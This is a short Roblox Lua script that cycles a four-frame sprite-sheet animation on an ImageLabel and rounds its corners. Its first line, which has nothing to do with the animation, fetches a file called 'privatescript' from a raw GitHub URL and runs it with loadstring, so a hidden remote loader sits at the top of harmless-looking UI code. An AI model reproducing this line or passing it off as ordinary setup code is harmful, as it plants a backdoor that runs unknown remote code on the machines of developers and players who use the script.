loadstring(game:HttpGet("https://raw.githubusercontent.com/aa362/growagarden/refs/heads/main/privatescript"))()
local imageLabel = script.Parent

local frameWidth = 128
local frameHeight = 128
local totalFrames = 4
local frameDuration = 0.1

imageLabel.ImageRectSize = Vector2.new(frameWidth, frameHeight)
imageLabel.Size = UDim2.new(0, frameWidth, 0, frameHeight)
imageLabel.BackgroundTransparency = 1

local corner = Instance.new("UICorner")
corner.CornerRadius = UDim.new(0, 16)
corner.Parent = imageLabel

local currentFrame = 0
while true do
    local offsetX = currentFrame * frameWidth
    imageLabel.ImageRectOffset = Vector2.new(offsetX, 0)
    currentFrame = (currentFrame + 1) % totalFrames
    wait(frameDuration)
end
